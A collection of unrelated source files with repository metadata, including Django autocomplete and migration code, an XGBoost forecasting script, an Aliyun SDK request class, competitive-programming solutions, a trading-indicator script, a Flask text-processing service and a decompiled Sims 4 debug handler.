from django.utils.translation import ugettext_lazy as _
__all__ = ('ChannelBase',)
class ChannelBase(object):
"""
A basic implementation of a channel, which should fit most use cases.
Attributes:
model
The model class this channel serves. If None, a new class will be
created in registry.register, and the model attribute will be set in
that subclass. So you probably don't need to worry about it, just know
that it's there for you to use.
result_template
The template to use in result_as_html method, to render a single
autocomplete suggestion. By default, it is
autocomplete_light/channelname/result.html or
autocomplete_light/result.html.
autocomplete_template
The template to use in render_autocomplete method, to render the
autocomplete box. By default, it is
autocomplete_light/channelname/autocomplete.html or
autocomplete_light/autocomplete.html.
search_field
The name of the field that the default implementation of query_filter
uses. Default is 'name'.
limit_results
The number of results that this channel should return. For example, if
        query_filter returns 50 results and limit_results is 20, then the
first 20 of 50 results will be rendered. Default is 20.
bootstrap
The name of the bootstrap kind. By default, deck.js will only
initialize decks for wrappers that have data-bootstrap="normal". If
you want to implement your own bootstrapping logic in javascript,
then you set bootstrap to anything that is not "normal". Default is
'normal'.
placeholder
The initial text in the autocomplete text input.
"""
model = None
search_field = 'name'
limit_results = 20
bootstrap = 'normal'
placeholder = _(u'type some text to search in this autocomplete')
result_template = None
autocomplete_template = None
def __init__(self):
"""
Set result_template and autocomplete_template if necessary.
"""
name = self.__class__.__name__.lower()
if not self.result_template:
self.result_template = [
'autocomplete_light/%s/result.html' % name,
'autocomplete_light/result.html',
]
if not self.autocomplete_template:
self.autocomplete_template = [
'autocomplete_light/%s/autocomplete.html' % name,
'autocomplete_light/autocomplete.html',
]
self.request = None
def get_absolute_url(self):
"""
Return the absolute url for this channel, using
autocomplete_light_channel url
"""
return urlresolvers.reverse('autocomplete_light_channel', args=(
self.__class__.__name__,))
def as_dict(self):
"""
Return a dict of variables for this channel, it is used by javascript.
"""
return {
'url': self.get_absolute_url(),
'name': self.__class__.__name__
}
def init_for_request(self, request, *args, **kwargs):
"""
Set self.request, self.args and self.kwargs, useful in query_filter.
"""
self.request = request
self.args = args
self.kwargs = kwargs
def query_filter(self, results):
"""
Filter results using the request.
By default this will expect results to be a queryset, and will filter
it with self.search_field + '__icontains'=self.request['q'].
"""
q = self.request.GET.get('q', None)
if q:
kwargs = {"%s__icontains" % self.search_field: q}
results = results.filter(**kwargs)
return results
def values_filter(self, results, values):
"""
Filter results based on a list of values.
By default this will expect values to be an iterable of model ids, and
results to be a queryset. Thus, it will return a queryset where pks are
in values.
"""
results = results.filter(pk__in=values)
return results
def get_queryset(self):
"""
Return a queryset for the channel model.
"""
return self.model.objects.all()
def get_results(self, values=None):
"""
Return an iterable of result to display in the autocomplete box.
By default, it will:
- call self.get_queryset(),
- call values_filter() if values is not None,
- call query_filter() if self.request is set,
- call order_results(),
- return a slice from offset 0 to self.limit_results.
"""
results = self.get_queryset()
if values is not None:
# used by the widget to prerender existing values
results = self.values_filter(results, values)
elif self.request:
# used by the autocomplete
results = self.query_filter(results)
return self.order_results(results)[0:self.limit_results]
def order_results(self, results):
"""
Return the result list after ordering.
        By default, it expects results to be a queryset and orders it by
search_field.
"""
return results.order_by(self.search_field).distinct()
def are_valid(self, values):
"""
Return True if the values are valid.
By default, expect values to be a list of object ids, return True if
all the ids are found in the queryset.
"""
return self.get_queryset().filter(pk__in=values).count() == len(values)
def result_as_html(self, result, extra_context=None):
"""
Return the html representation of a result for display in the deck
and autocomplete box.
By default, render result_template with channel and result in the
context.
"""
context = {
'channel': self,
'result': result,
'value': self.result_as_value(result),
}
context.update(extra_context or {})
return loader.render_to_string(self.result_template, context)
def result_as_value(self, result):
"""
Return the value that should be set to the widget field for a result.
By default, return result.pk.
"""
return result.pk
def render_autocomplete(self):
"""
Render the autocomplete suggestion box.
By default, render self.autocomplete_template with the channel in the
context.
"""
return loader.render_to_string(self.autocomplete_template, {
'channel': self,
})
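# A minimal usage sketch (an assumption, not part of this module): subclass
# ChannelBase for a hypothetical ``City`` model exposing a ``name`` field.
#
#     class CityChannel(ChannelBase):
#         model = City            # model whose instances are suggested
#         search_field = 'name'   # query_filter() matches name__icontains
#         limit_results = 10      # render at most 10 suggestions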
|
[
"[email protected]"
] | |
a585d4489cb8b4295cdbaa734255fddff64656b5
|
416f598c62277659f787a37d06f3ebc633a79d53
|
/every_election/apps/organisations/migrations/0036_auto_20180606_1035.py
|
bfa7659c15a88e941da82db96db06e8575c0edfb
|
[] |
no_license
|
chris48s/EveryElection
|
53b6d807e97b2a8b9a943dedcc5ff6ecc65d20fc
|
38192a075ae359b91e2aa352fb3886c6c93d3337
|
refs/heads/master
| 2021-01-22T19:49:15.898338 | 2018-08-17T09:11:42 | 2018-08-17T09:11:42 | 85,244,907 | 0 | 0 | null | 2017-03-16T21:53:29 | 2017-03-16T21:53:28 | null |
UTF-8
|
Python
| false | false | 484 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.13 on 2018-06-06 10:35
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('organisations', '0035_rename_divset_constraint'),
]
operations = [
migrations.AlterModelOptions(
name='organisation',
options={'get_latest_by': 'start_date', 'ordering': ('official_name', '-start_date')},
),
]
|
[
"[email protected]"
] | |
0216d00c4a0280404201ed358bfc7c240952ec5a
|
0202d8faff21f24e468654b3da56ca16457ff5b3
|
/entrant/abc133/abc133-c.py
|
a93b0c17761a620084c2519ce520de7d390fcc5d
|
[] |
no_license
|
ryogoOkura/atcoder
|
a3d8d052c6424db26994444eca1ebaa3efbd3e21
|
2865b42bbdb50d83bf129fd868083c2363e92024
|
refs/heads/master
| 2021-06-24T06:07:32.290393 | 2021-01-02T13:39:24 | 2021-01-02T13:39:24 | 187,552,021 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 258 |
py
|
l,r=map(int,input().split())
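# If l and r fall in different blocks of 2019 consecutive integers, the range
# contains a multiple of 2019, so some product i*j is divisible by 2019 and the
# minimum is 0; otherwise only the residues mod 2019 matter.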
if (l//2019) == (r//2019):
l,r=l%2019,r%2019
ans=2018
for i in range(l,r):
for j in range(i+1,r+1):
tmp=(i*j)%2019
if tmp<ans:
ans=tmp
print(ans)
else:
print(0)
|
[
"[email protected]"
] | |
39ceb9d36775a75edf35014ee07e0ae39affc16f
|
f8f2536fa873afa43dafe0217faa9134e57c8a1e
|
/aliyun-python-sdk-hbr/aliyunsdkhbr/request/v20170908/DescribeHanaRestoresRequest.py
|
29b991a2c5cbecc928a581fe3e4ae75d2966a997
|
[
"Apache-2.0"
] |
permissive
|
Sunnywillow/aliyun-openapi-python-sdk
|
40b1b17ca39467e9f8405cb2ca08a85b9befd533
|
6855864a1d46f818d73f5870da0efec2b820baf5
|
refs/heads/master
| 2022-12-04T02:22:27.550198 | 2020-08-20T04:11:34 | 2020-08-20T04:11:34 | 288,944,896 | 1 | 0 |
NOASSERTION
| 2020-08-20T08:04:01 | 2020-08-20T08:04:01 | null |
UTF-8
|
Python
| false | false | 2,536 |
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
class DescribeHanaRestoresRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'hbr', '2017-09-08', 'DescribeHanaRestores','hbr')
self.set_protocol_type('https')
def get_VaultId(self):
return self.get_query_params().get('VaultId')
def set_VaultId(self,VaultId):
self.add_query_param('VaultId',VaultId)
def get_DatabaseName(self):
return self.get_query_params().get('DatabaseName')
def set_DatabaseName(self,DatabaseName):
self.add_query_param('DatabaseName',DatabaseName)
def get_BackupId(self):
return self.get_query_params().get('BackupId')
def set_BackupId(self,BackupId):
self.add_query_param('BackupId',BackupId)
def get_PageSize(self):
return self.get_query_params().get('PageSize')
def set_PageSize(self,PageSize):
self.add_query_param('PageSize',PageSize)
def get_RestoreStatus(self):
return self.get_query_params().get('RestoreStatus')
def set_RestoreStatus(self,RestoreStatus):
self.add_query_param('RestoreStatus',RestoreStatus)
def get_RestoreId(self):
return self.get_query_params().get('RestoreId')
def set_RestoreId(self,RestoreId):
self.add_query_param('RestoreId',RestoreId)
def get_ClusterId(self):
return self.get_query_params().get('ClusterId')
def set_ClusterId(self,ClusterId):
self.add_query_param('ClusterId',ClusterId)
def get_PageNumber(self):
return self.get_query_params().get('PageNumber')
def set_PageNumber(self,PageNumber):
self.add_query_param('PageNumber',PageNumber)
def get_Token(self):
return self.get_query_params().get('Token')
def set_Token(self,Token):
self.add_query_param('Token',Token)
|
[
"[email protected]"
] | |
e7b2527e9d44eef72048f1bb2f0a78a12a668f9b
|
77639380e2c33eee09179f372632bcb57d3f7e3f
|
/favorita/base_xgb_model.py
|
d550fd5b81efab514e96961f156451c648bd8a32
|
[] |
no_license
|
razmik/demand_forecast_walmart
|
b8f5c4aaa3cb6dccae102e4ca19f1131131a9f26
|
56292bfbeebc1d3d4962e3ee26d05be2aebd5f4c
|
refs/heads/master
| 2023-01-22T12:30:18.129486 | 2020-08-10T10:44:12 | 2020-08-10T10:44:12 | 283,923,690 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,399 |
py
|
"""
Author: Rashmika Nawaratne
Date: 05-Aug-20 at 4:53 PM
"""
import pandas as pd
import numpy as np
from datetime import datetime
import time
import gc
from xgboost import XGBRegressor
from xgboost import Booster
import matplotlib.pyplot as plt
from favorita.load_data import Data
from favorita.evaluation import Evaluator
MODEL_NAME = 'base_xgb'
OUTPUT_FOLDER = 'model_outputs/' + MODEL_NAME
SELECTED_STORES = [i for i in range(1, 55)]
ONLY_EVALUATE = False
if __name__ == "__main__":
start_time = time.time()
data = Data()
end_time = time.time()
print("Load data in: {} mins.".format((end_time - start_time) / 60))
# Filter stores to reduce the dataset
data.train = data.train.loc[data.train.store_nbr.isin(SELECTED_STORES)]
# Feature Engineering
data.train['month'] = data.train['date'].dt.month
data.train['week'] = data.train['date'].dt.week
data.train['day'] = data.train['date'].dt.dayofweek
data.train['month'] = data.train['month'].astype('int8')
data.train['week'] = data.train['week'].astype('int8')
data.train['day'] = data.train['day'].astype('int8')
# Log transform the target variable (unit_sales)
data.train['unit_sales'] = data.train['unit_sales'].apply(lambda u: np.log1p(float(u)) if float(u) > 0 else 0)
# Merge tables
df_full = pd.merge(data.train, data.items[['item_nbr', 'perishable', 'family']],
on='item_nbr') # Train and items (perishable state)
df_full = pd.merge(df_full,
data.weather_oil_holiday[['date', 'store_nbr', 'is_holiday', 'AvgTemp', 'dcoilwtico_imputed']],
on=['date', 'store_nbr'], how='left') # Merge weather, oil and holiday
del df_full['id']
df_full.rename(columns={'dcoilwtico_imputed': 'oil_price', 'AvgTemp': 'avg_temp'}, inplace=True)
# Get test train split
df_train = df_full[(df_full['date'] > datetime(2017, 1, 1)) & (df_full['date'] < datetime(2017, 7, 12))]
df_valid = df_full[(df_full['date'] >= datetime(2017, 7, 12)) & (df_full['date'] < datetime(2017, 7, 31))]
df_test = df_full[df_full['date'] >= datetime(2017, 7, 31)]
# clean variables
del data
del df_full
gc.collect()
# Modeling
feature_columns = ['store_nbr', 'item_nbr', 'onpromotion', 'month', 'week', 'day', 'perishable', 'is_holiday',
'avg_temp', 'oil_price']
target_column = ['unit_sales']
X_train, Y_train = df_train[feature_columns], df_train[target_column]
X_valid, Y_valid = df_valid[feature_columns], df_valid[target_column]
X_test, Y_test = df_test[feature_columns], df_test[target_column]
print('Training dataset: {}'.format(X_train.shape))
print('Testing dataset: {}'.format(X_test.shape))
if not ONLY_EVALUATE:
# Default XGB
model_xgr_1 = XGBRegressor()
start_time = time.time()
model_xgr_1.fit(X_valid, Y_valid)
end_time = time.time()
print("Model Train time: {} mins.".format((end_time - start_time) / 60))
# Save model
model_xgr_1._Booster.save_model(OUTPUT_FOLDER + '.model')
else:
# Load from file
model_xgr_1 = Booster().load_model(OUTPUT_FOLDER + '.model')
Y_pred = model_xgr_1.predict(X_test)
# Get target variables back from log (antilog)
Y_pred_antilog = np.clip(np.expm1(Y_pred), 0, 1000)
Y_test_antilog = np.expm1(Y_test)
# Evaluation
weights = X_test["perishable"].values * 0.25 + 1
eval = Evaluator()
error_data = []
columns = ['Target unit', 'Data split', 'MSE', 'RMSE', 'NWRMSLE', 'MAE', 'MAPE']
mse_val_lg, rmse_val_lg, nwrmsle_val_lg, mae_val_lg, mape_val_lg = eval.get_error(weights, Y_test, Y_pred, 1)
mse_val, rmse_val, nwrmsle_val, mae_val, mape_val = eval.get_error(weights, Y_test_antilog, Y_pred_antilog, 1)
error_data.append(['Log', 'Test', mse_val_lg, rmse_val_lg, nwrmsle_val_lg, mae_val_lg, mape_val_lg])
error_data.append(['Unit', 'Test', mse_val, rmse_val, nwrmsle_val, mae_val, mape_val])
pd.DataFrame(error_data, columns=columns).to_csv(OUTPUT_FOLDER + '_evaluation.csv', index=False)
# Visualize
# plt.figure()
#
# plt.scatter(Y_test_antilog, Y_pred_antilog, color='blue')
# plt.xlabel("Unit Sales")
# plt.ylabel("Predicted Unit Sales")
# plt.title("Actual vs Predicted Unit Sales")
# plt.show()
|
[
"[email protected]"
] | |
4103376dbbca20b7caa6c000a96c5304895c31f9
|
e017eca53dbe0d35977546df1bb36a59915f6899
|
/debugging/assert_variable.py
|
8aec26cfafa0f80b02465a455cc3c785aa89bd35
|
[] |
no_license
|
clivejan/python_basic
|
7d14b7335f253658f8814acbdb753a735481e377
|
773de644a87792b872e38017dcac34c1691ccc87
|
refs/heads/master
| 2020-12-04T17:44:24.737370 | 2020-01-09T14:43:36 | 2020-01-18T03:11:20 | 231,856,419 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 334 |
py
|
#!/usr/bin/env python3 -O
# Assertions are for programmer errors and should not be
# handled with try/except. Note that running Python with -O
# (as in the shebang above) disables assert statements entirely.
# This assertion passes
job_title = 'DevOps'
assert job_title == "DevOps", "Transform from SE to DevOps"
# This assertion fails and raises AssertionError
job_title = 'Systems Engineer'
assert job_title == "DevOps", "Transform from SE to DevOps"
print(job_title)
|
[
"[email protected]"
] | |
0116db3631d3d531836248a0bca1d5d46ba83d49
|
302442c32bacca6cde69184d3f2d7529361e4f3c
|
/cidtrsend-all/stage3-model/pytz/zoneinfo/Africa/Bujumbura.py
|
76c4c7a6e44ba67e832b34d93a452c2827caf84f
|
[] |
no_license
|
fucknoob/WebSemantic
|
580b85563072b1c9cc1fc8755f4b09dda5a14b03
|
f2b4584a994e00e76caccce167eb04ea61afa3e0
|
refs/heads/master
| 2021-01-19T09:41:59.135927 | 2015-02-07T02:11:23 | 2015-02-07T02:11:23 | 30,441,659 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 391 |
py
|
'''tzinfo timezone information for Africa/Bujumbura.'''
from pytz.tzinfo import StaticTzInfo
from pytz.tzinfo import memorized_timedelta as timedelta
class Bujumbura(StaticTzInfo):
'''Africa/Bujumbura timezone definition. See datetime.tzinfo for details'''
zone = 'Africa/Bujumbura'
_utcoffset = timedelta(seconds=7200)
_tzname = 'CAT'
Bujumbura = Bujumbura()
|
[
"[email protected]"
] | |
ab96c2674dd84ae1432b1ef67ca398aa1e033854
|
71f3ecb8fc4666fcf9a98d39caaffc2bcf1e865c
|
/.history/第2章/2-2/lishi_20200527235931.py
|
947e75d59de12d8489b2a6b14a7c1c09b49fe148
|
[
"MIT"
] |
permissive
|
dltech-xyz/Alg_Py_Xiangjie
|
03a9cac9bdb062ce7a0d5b28803b49b8da69dcf3
|
877c0f8c75bf44ef524f858a582922e9ca39bbde
|
refs/heads/master
| 2022-10-15T02:30:21.696610 | 2020-06-10T02:35:36 | 2020-06-10T02:35:36 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 955 |
py
|
#!/usr/bin/env python
# coding=utf-8
'''
@version:
@Author: steven
@Date: 2020-05-27 22:20:22
@LastEditors: steven
@LastEditTime: 2020-05-27 23:59:31
@Description: Keep the last few items of a list as a search history.
'''
from collections import deque
def search(lines, pattern, history=5):
previous_lines = deque(maxlen=history)
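    # A deque with maxlen keeps only the most recent `history` lines;
    # appending to a full deque silently discards the oldest entry.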
for line in lines:
if pattern in line:
yield line, previous_lines
previous_lines.append(line)
# Example use on a file
if __name__ == '__main__':
with open('\123.txt') as f:
# with open('123.txt') as f: # FileNotFoundError: [Errno 2] No such file or directory: '123.txt'
for line, prevlines in search(f, 'python', 5):
for pline in prevlines:
print(pline) # print (pline, end='')
print(line) # print (pline, end='')
print('-' * 20)
q = deque(maxlen=3)
q.append(1)
q.append(2)
q.append(3)
print(q)
q.append(4)
print(q)
|
[
"[email protected]"
] | |
82c5ce7b4ebbb0b5752945713ead109a06be2960
|
16ba38ef11b82e93d3b581bbff2c21e099e014c4
|
/haohaninfo/Python_Future_Sample/實單交易/90.py
|
dbf39a68d38224f520449600d95099dfb3431206
|
[] |
no_license
|
penguinwang96825/Auto-Trading
|
cb7a5addfec71f611bdd82534b90e5219d0602dd
|
a031a921dbc036681c5054f2c035f94499b95d2e
|
refs/heads/master
| 2022-12-24T21:25:34.835436 | 2020-09-22T09:59:56 | 2020-09-22T09:59:56 | 292,052,986 | 2 | 5 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,692 |
py
|
# -*- coding: UTF-8 -*-
# Load the required packages
import sys,indicator,datetime,haohaninfo
# Broker
Broker = 'Masterlink_Future'
# Data table type
Table = 'match'
# Product name
Prod = sys.argv[1]
# Get today's date
Date = datetime.datetime.now().strftime("%Y%m%d")
# K-bar (candlestick) object
KBar = indicator.KBar(Date,'time',1)
# Williams %R period, overbought and oversold thresholds
WILLRPeriod = 14
OverBuy = -20
OverSell = -80
# Default trend is 1, i.e. assume only long entries
Trend=1
# Entry decision
Index=0
GO = haohaninfo.GOrder.GOQuote()
for i in GO.Describe(Broker, Table, Prod):
    time = datetime.datetime.strptime(i[0],'%Y/%m/%d %H:%M:%S.%f')
    price=float(i[2])
    qty=int(i[3])
    tag=KBar.TimeAdd(time,price,qty)
    # Only evaluate when the K-bar updates; to evaluate tick by tick, comment out the two lines below
    if tag != 1:
        continue
    Real = KBar.GetWILLR(WILLRPeriod)
    # Only start judging once the Williams %R values have been computed
    if len(Real) > WILLRPeriod+1:
        ThisReal = Real[-1-tag]
        LastReal = Real[-2-tag]
        # Entered the oversold zone and then turned back up
        if Trend==1 and ThisReal > OverSell and LastReal <= OverSell:
            Index=1
            OrderTime=time
            OrderPrice=price
            print(OrderTime,"Order Buy Price:",OrderPrice,"Success!")
            GO.EndDescribe()
        # Entered the overbought zone and then turned back down
        elif Trend==-1 and ThisReal < OverBuy and LastReal >= OverBuy:
            Index=-1
            OrderTime=time
            OrderPrice=price
            print(OrderTime,"Order Sell Price:",OrderPrice,"Success!")
            GO.EndDescribe()
|
[
"[email protected]"
] | |
5106152e77d060a927253686296d12540bed8155
|
2a94e60460f91c4a4b919953ef1a15de4d89166a
|
/argil_cb_pos_ticket/pos.py
|
79525802be904af3b677e6207922930e7981aaf3
|
[] |
no_license
|
germanponce/addons_cb
|
de8ddee13df36cf2278edbbc495564bbff8ea29e
|
858453d4f4c3e8b43d34a759b20306926f0bf63e
|
refs/heads/master
| 2021-01-22T23:20:16.826694 | 2015-10-29T22:05:03 | 2015-10-29T22:05:03 | 41,502,521 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,265 |
py
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import models, fields, api, _
from openerp.tools import float_compare
import openerp.addons.decimal_precision as dp
from datetime import time, datetime
from openerp import SUPERUSER_ID
from openerp import tools
from openerp.osv import osv, fields, expression
from openerp.tools.translate import _
from openerp.exceptions import except_orm, Warning, RedirectWarning
import base64
import amount_to_text_mx as amount_to
# AMOUNT TO TEXT
class pos_order(osv.osv):
_name ='pos.order'
_inherit = 'pos.order'
def _amount_text(self, cr, uid, ids, field_name, args, context=None):
if not context:
context = {}
res = {}
amount_to_text = ''
for record in self.browse(cr, uid, ids, context=context):
if record.amount_total > 0:
amount_to_text = amount_to.get_amount_to_text(
self, record.amount_total, 'es_cheque', record.pricelist_id.currency_id.name
)
res[record.id] = amount_to_text
return res
_columns = {
'amount_to_text': fields.function(_amount_text, method=True, string='Monto en Letra', type='char', size=256, store=True),
}
|
[
"[email protected]"
] | |
0a97d29e2bec4a1a9d370b41f0a000614f2f24db
|
c3e2f56672e01590dc7dc7e184f30c2884ce5d3a
|
/Programs/MyPythonXII/Unit1/PyChap06/filera.py
|
9500b097eee3e35d0a288c02f76d1e850d45b55f
|
[] |
no_license
|
mridulrb/Basic-Python-Examples-for-Beginners
|
ef47e830f3cc21cee203de2a7720c7b34690e3e1
|
86b0c488de4b23b34f7424f25097afe1874222bd
|
refs/heads/main
| 2023-01-04T09:38:35.444130 | 2020-10-18T15:59:29 | 2020-10-18T15:59:29 | 305,129,417 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 364 |
py
|
# File name: ...\\MyPythonXII\Unit1\PyChap06\filera.py
import os
txtfile = "Friends.txt" # Text file is assigned
if os.path.isfile(txtfile):
print ("Friends names are...")
print ("-------------------")
for F in open(txtfile).read(): # Both open and read the contents
print (F, end="")
else:
print ("File does not exist.")
|
[
"[email protected]"
] | |
b8e7b0de85b7573829e61fafb9cd287c1173b9af
|
fbd5c602a612ea9e09cdd35e3a2120eac5a43ccf
|
/Finished/old_py/75.颜色分类.py
|
7bd771f54cb7ff8dcc151c48d2e2b94a7f6bf8e8
|
[] |
no_license
|
czccc/LeetCode
|
0822dffee3b6fd8a6c6e34be2525bbd65ccfa7c0
|
ddeb1c473935480c97f3d7986a602ee2cb3acaa8
|
refs/heads/master
| 2023-09-01T18:18:45.973563 | 2023-08-27T02:44:00 | 2023-08-27T02:44:00 | 206,226,364 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,119 |
py
|
#
# @lc app=leetcode.cn id=75 lang=python
#
# [75] Sort Colors
#
# @lc code=start
class Solution(object):
def sortColors(self, nums):
"""
:type nums: List[int]
:rtype: None Do not return anything, modify nums in-place instead.
"""
left, right = -1, len(nums)
p = 0
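        # Invariant: nums[:left+1] are all 0s, nums[left+1:p] are all 1s,
        # and nums[right:] are all 2s; nums[p:right] is still unscanned.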
while p < right:
if nums[p] == 2:
right -= 1
nums[p] = nums[right]
nums[right] = 2
elif nums[p] == 1:
p += 1
else:
left += 1
nums[p] = 1
nums[left] = 0
p += 1
return
# @lc code=end
# TEST ONLY
import unittest
import sys
sys.path.append("..")
from Base.PyVar import *
class SolutionTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls._func = Solution().sortColors
def test_1(self):
args = [[2, 0, 2, 1, 1, 0]]
ans = [0, 0, 1, 1, 2, 2]
cur_ans = self._func(*args)
self.assertEqual(args[0], ans)
if __name__ == "__main__":
unittest.main(verbosity=2)
|
[
"[email protected]"
] | |
5c9dac8602f051955f5bba3b5b992bee8b05f77a
|
88900156c1fc6d496e87a0c403811e30a7398cfc
|
/check4fsm/Communication.py
|
70dd87ad40c4646164be3443114f9caeac43fce8
|
[] |
no_license
|
Totoro2205/check4fsm
|
4be7b73b9331ed2d46ce119b762d67a64a4420cc
|
4245b7f0babca6f5d15d1f85ee85fddc69cf0196
|
refs/heads/main
| 2023-08-10T07:32:22.121413 | 2021-09-20T09:28:57 | 2021-09-20T09:28:57 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,207 |
py
|
#!/usr/bin/env python
from check4fsm.ProccesText import ProcessText
from check4fsm.TonalizeText import TonalText
from check4fsm.ProcessAppeal import ProcessAppeal
from check4fsm.extractAllData import ExtractData
from check4fsm import *
from natasha import Segmenter, Doc
from loguru import logger
from flask_cors import CORS
import flask
import time
import nltk
import os
logger.add(f"{os.getcwd()}/.logger.log", format="{time} {level} {message}", rotation="50 MB")
ed = ExtractData(os.getcwd() + "/../data/cities.json", os.getcwd() + "/../data/NER.json")
app = flask.Flask(__name__)
class CommunicationFlask:
CORS(app)
def __init__(self, cities: str = os.getcwd() + "/../data/cities.json",
ner: str = os.getcwd() + "/../data/NER.json"):
global ed
ed = ExtractData(cities, ner)
@staticmethod
@logger.catch
@app.route('/', methods=["GET"])
def main_route():
data = flask.request.json
global ed
if data is None:
logger.error(f" failed data is None")
return {}
output_data = dict()
try:
output_data = ed(data["text"])
except Exception as ex:
logger.error(f" failed on the server {ex}")
return {}
return output_data
@staticmethod
@logger.catch
@app.route('/', methods=["POST"])
def hooks():
data = flask.request.json
global ed
if data is None:
logger.error(f" failed data is None")
return {}
output_data = dict()
try:
output_data = ed(data["text"])
except Exception as ex:
logger.error(f" failed on the server {ex}")
return {}
return output_data
@logger.catch
def run_flask(self):
global app
app.run(host="0.0.0.0", port=9000)
def run(cities: str = os.getcwd() + "/data/cities.json", ner: str = os.getcwd() + "/data/NER.json"):
logger.info("Loading all systems")
p = CommunicationFlask(cities, ner)
logger.info("Loaded all systems")
p.run_flask()
if __name__ == '__main__':
run( os.getcwd() + "/data/cities.json", os.getcwd() + "/data/NER.json")
|
[
"[email protected]"
] | |
62cfb6b503b6ce9ea99f372bcf8a13687c42dca9
|
b3b68efa404a7034f0d5a1c10b281ef721f8321a
|
/Scripts/simulation/conditional_layers/conditional_layer_handlers.py
|
9f92448745a071c4aac20c994e6eed081d12f54c
|
[
"Apache-2.0"
] |
permissive
|
velocist/TS4CheatsInfo
|
62195f3333076c148b2a59f926c9fb5202f1c6fb
|
b59ea7e5f4bd01d3b3bd7603843d525a9c179867
|
refs/heads/main
| 2023-03-08T01:57:39.879485 | 2021-02-13T21:27:38 | 2021-02-13T21:27:38 | 337,543,310 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,967 |
py
|
# uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\conditional_layers\conditional_layer_handlers.py
# Compiled at: 2018-05-11 22:46:41
# Size of source mod 2**32: 5273 bytes
from gsi_handlers.gameplay_archiver import GameplayArchiver
from sims4.gsi.dispatcher import GsiHandler
from sims4.gsi.schema import GsiGridSchema, GsiFieldVisualizers
import date_and_time, enum, services
conditional_layer_service_schema = GsiGridSchema(label='Conditional Layers/Conditional Layer Service')
conditional_layer_service_schema.add_field('conditional_layer', label='Class Name', width=1, unique_field=True)
conditional_layer_service_schema.add_field('layer_hash', label='Layer Name', width=1)
conditional_layer_service_schema.add_field('objects_created', label='Objects Created', width=1)
conditional_layer_service_schema.add_field('requests_waiting', label='Requests Waiting', width=1)
conditional_layer_service_schema.add_field('last_request', label='Last Request', width=1)
with conditional_layer_service_schema.add_has_many('Objects', GsiGridSchema) as (sub_schema):
sub_schema.add_field('object_id', label='Object Id')
sub_schema.add_field('object', label='Object')
with conditional_layer_service_schema.add_has_many('Requests', GsiGridSchema) as (sub_schema):
sub_schema.add_field('request', label='Request')
sub_schema.add_field('speed', label='Speed')
sub_schema.add_field('timer_interval', label='Timer Interval')
sub_schema.add_field('timer_object_count', label='Timer Object Count')
@GsiHandler('conditional_layer_service', conditional_layer_service_schema)
def generate_conditional_layer_service_data(zone_id: int=None):
layer_data = []
conditional_layer_service = services.conditional_layer_service()
if conditional_layer_service is None:
return layer_data
object_manager = services.object_manager()
for conditional_layer, layer_info in conditional_layer_service._layer_infos.items():
object_data = []
for object_id in layer_info.objects_loaded:
obj = object_manager.get(object_id)
object_data.append({'object_id':str(object_id),
'object':str(obj)})
request_data = []
for request in conditional_layer_service.requests:
if request.conditional_layer is conditional_layer:
request_data.append({'request':str(request),
'speed':request.speed.name,
'timer_interval':str(request.timer_interval),
'timer_object_count':str(request.timer_object_count)})
layer_data.append({'layer_hash':str(conditional_layer.layer_name),
'conditional_layer':str(conditional_layer),
'objects_created':str(len(layer_info.objects_loaded)),
'requests_waiting':str(len(request_data)),
'last_request':str(layer_info.last_request_type),
'Objects':object_data,
'Requests':request_data})
return layer_data
class LayerRequestAction(enum.Int, export=False):
SUBMITTED = ...
EXECUTING = ...
COMPLETED = ...
conditional_layer_request_archive_schema = GsiGridSchema(label='Conditional Layers/Conditional Layer Request Archive', sim_specific=False)
conditional_layer_request_archive_schema.add_field('game_time', label='Game/Sim Time', type=(GsiFieldVisualizers.TIME))
conditional_layer_request_archive_schema.add_field('request', label='Request')
conditional_layer_request_archive_schema.add_field('action', label='Action')
conditional_layer_request_archive_schema.add_field('layer_hash', label='Layer Hash')
conditional_layer_request_archive_schema.add_field('speed', label='Speed')
conditional_layer_request_archive_schema.add_field('timer_interval', label='Timer Interval')
conditional_layer_request_archive_schema.add_field('timer_object_count', label='Timer Object Count')
conditional_layer_request_archive_schema.add_field('objects_in_layer_count', label='Object Count')
